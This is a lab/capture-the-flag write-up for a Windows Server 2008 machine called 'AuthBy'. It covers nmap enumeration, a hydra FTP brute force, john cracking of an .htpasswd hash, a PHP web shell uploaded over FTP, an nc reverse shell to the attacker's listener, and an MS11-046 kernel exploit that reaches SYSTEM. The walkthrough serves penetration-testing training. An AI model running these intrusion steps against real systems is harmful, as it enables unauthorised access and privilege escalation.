Machine Information
- Machine Name: AuthBy
- Machine Difficulty: Intermediate
Information Gathering
Classic nmap time
Nmap scan report for 192.168.206.46
Host is up, received user-set (0.017s latency).
Scanned at 2024-10-07 16:27:37 +08 for 122s
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 125 zFTPServer 6.0 build 2011-10-17
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| total 9680
| ---------- 1 root root 5610496 Oct 18 2011 zFTPServer.exe
| ---------- 1 root root 25 Feb 10 2011 UninstallService.bat
| ---------- 1 root root 4284928 Oct 18 2011 Uninstall.exe
| ---------- 1 root root 17 Aug 13 2011 StopService.bat
| ---------- 1 root root 18 Aug 13 2011 StartService.bat
| ---------- 1 root root 8736 Nov 09 2011 Settings.ini
| dr-xr-xr-x 1 root root 512 Oct 07 15:27 log
| ---------- 1 root root 2275 Aug 08 2011 LICENSE.htm
| ---------- 1 root root 23 Feb 10 2011 InstallService.bat
| dr-xr-xr-x 1 root root 512 Nov 08 2011 extensions
| dr-xr-xr-x 1 root root 512 Nov 08 2011 certificates
|_dr-xr-xr-x 1 root root 512 Aug 03 20:17 accounts
242/tcp open http syn-ack ttl 125 Apache httpd 2.2.21 ((Win32) PHP/5.3.8)
|_http-server-header: Apache/2.2.21 (Win32) PHP/5.3.8
|_http-title: 401 Authorization Required
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-auth:
| HTTP/1.1 401 Authorization Required\x0D
|_ Basic realm=Qui e nuce nuculeum esse volt, frangit nucem!
3145/tcp open zftp-admin syn-ack ttl 125 zFTPServer admin
3389/tcp open ssl/ms-wbt-server? syn-ack ttl 125
| rdp-ntlm-info:
| Target_Name: LIVDA
| NetBIOS_Domain_Name: LIVDA
| NetBIOS_Computer_Name: LIVDA
| DNS_Domain_Name: LIVDA
| DNS_Computer_Name: LIVDA
| Product_Version: 6.0.6001
|_ System_Time: 2024-10-07T08:29:33+00:00
|_ssl-date: 2024-10-07T08:29:38+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=LIVDA
| Issuer: commonName=LIVDA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2024-08-02T13:17:54
| Not valid after: 2025-02-01T13:17:54
| MD5: 650f:e7dd:0507:c634:18f8:aed5:f63e:fd7c
| SHA-1: 0d17:0b40:5f95:dd6b:6e26:b109:6cde:370d:ac4b:05d0
There are two unusual ports, 242 and 3145. Port 21 shows that anonymous login is allowed. Let's see what's useful inside.
Port 21
Let's replicate the anonymous login first.
ftp 192.168.206.46
Connected to 192.168.206.46.
220 zFTPServer v6.0, build 2011-10-17 15:25 ready.
Name (192.168.206.46:root): Anonymous
331 User name received, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
After exploring around, I noticed that I could not read or write any directories or files. The only thing I could do was list the available directories and files. The only interesting information I found was some potential usernames.
ftp> cd accounts
250 CWD Command successful.
ftp> dir
229 Entering Extended Passive Mode (|||2050|)
150 Opening connection for /bin/ls.
total 4
dr-xr-xr-x 1 root root 512 Aug 03 20:17 backup
---------- 1 root root 764 Aug 03 20:17 acc[Offsec].uac
---------- 1 root root 1030 Aug 03 20:17 acc[anonymous].uac
---------- 1 root root 926 Aug 03 20:17 acc[admin].uac
Since there was not much I could do, the next thing I tried was logging in to FTP with the potential username.
hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://192.168.206.46 -t 64
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-10-07 21:00:01
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ftp://192.168.206.46:21/
[STATUS] 4197.00 tries/min, 4197 tries in 00:01h, 14340202 to do in 56:57h, 64 active
[STATUS] 4222.33 tries/min, 12667 tries in 00:03h, 14331732 to do in 56:35h, 64 active
[21][ftp] host: 192.168.206.46 login: admin password: admin
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-10-07 21:04:46
After brute forcing with common passwords, there is a result: the credentials are admin:admin. Then it's time to log in to FTP again.
ftp 192.168.206.46
Connected to 192.168.206.46.
220 zFTPServer v6.0, build 2011-10-17 15:25 ready.
Name (192.168.206.46:root): admin
331 User name received, need password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||2051|)
150 Opening connection for /bin/ls.
total 3
-r--r--r-- 1 root root 76 Nov 08 2011 index.php
-r--r--r-- 1 root root 45 Nov 08 2011 .htpasswd
-r--r--r-- 1 root root 161 Nov 08 2011 .htaccess
226 Closing data connection.
It seems that I have access to different files, and both reading and writing work. It looks like I could just upload my vulnerable PHP file and execute it through the website. But before uploading, let's go through all the files.
cat .htaccess
AuthName "Qui e nuce nuculeum esse volt, frangit nucem!"
AuthType Basic
AuthUserFile c:\\wamp\www\.htpasswd
<Limit GET POST PUT>
Require valid-user
</Limit>
cat .htpasswd
offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0
It seems the website is password protected, and the hash is right there in .htpasswd. Time to crack it using john.
john -w=/usr/share/wordlists/rockyou.txt hash
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
elite (offsec)
1g 0:00:00:00 DONE (2024-10-07 21:15) 3.333g/s 84160p/s 84160c/s 84160C/s lovestruck..cutegal
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
OK, now that I have the password, let's upload a vulnerable PHP file before moving on to the web port.
ftp> put vuln.php
local: vuln.php remote: vuln.php
229 Entering Extended Passive Mode (|||2056|)
150 File status okay; about to open data connection.
100% |***********************************************************************************************************************************************************************************************| 29 88.22 KiB/s 00:00 ETA
226 Closing data connection.
29 bytes sent in 00:00 (0.45 KiB/s)
Alright, the web port is 242 according to the nmap result.
Port 242
It asks for credentials, so it's time to use the ones cracked with john. They work, and I managed to access the website after providing the correct credentials. Since everything matches the FTP directory exactly, I navigated to my vulnerable PHP file and it works.
Time to get a reverse shell by uploading nc.exe.
rlwrap nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.45.191] from (UNKNOWN) [192.168.206.46] 49157
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
C:\wamp\www>whoami
whoami
livda\apache
Since I'm not a high privilege user, it's time for privilege escalation.
Privilege Escalation
Always use winPEAS for useful information (somehow, winPEAS does not work here; I guess it requires an older winPEAS or a different bitness). I checked my current user's privileges, and it seems I have SeImpersonatePrivilege, which I could use for potato attacks to get a high privilege user.
C:\wamp\www>whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
============ =============================================
livda\apache S-1-5-21-1204100616-2260006253-652133421-1000
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Unknown SID type S-1-16-12288 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Time to try PrintSpoofer and GodPotato to see if they work. Sadly, neither works. I then looked into the system information for more clues.
C:\Users\Public>systeminfo
systeminfo
Host Name: LIVDA
OS Name: Microsoftr Windows Serverr 2008 Standard
OS Version: 6.0.6001 Service Pack 1 Build 6001
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 92573-OEM-7502905-27565
Original Install Date: 12/19/2009, 11:25:57 AM
System Boot Time: 10/7/2024, 5:39:48 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2650 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 11/12/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT-08:00) Pacific Time (US & Canada)
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,644 MB
Page File: Max Size: 1,985 MB
Page File: Available: 1,547 MB
Page File: In Use: 438 MB
Page File Location(s): N/A
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): N/A
It seems to be a Microsoft Windows Server 2008 Standard OS. Time to google for privilege escalation using the OS name. After googling around, I found an exploit that looks promising. Time to explore and see how it works. Alright, I have no idea how to compile it, but I managed to find an alternative: https://github.com/SecWiki/windows-kernel-exploits. It has tons of compiled exploits, including the one I need. Time to upload it via FTP and execute it.
C:\wamp\www>.\ms11-046.exe
.\ms11-046.exe
c:\Windows\System32>whoami
whoami
nt authority\system
It works ~
Things I learned from this machine
- FTP might be using weak credentials
- how .htaccess and .htpasswd set up simple authentication
- literally searching for a kernel exploit for privilege escalation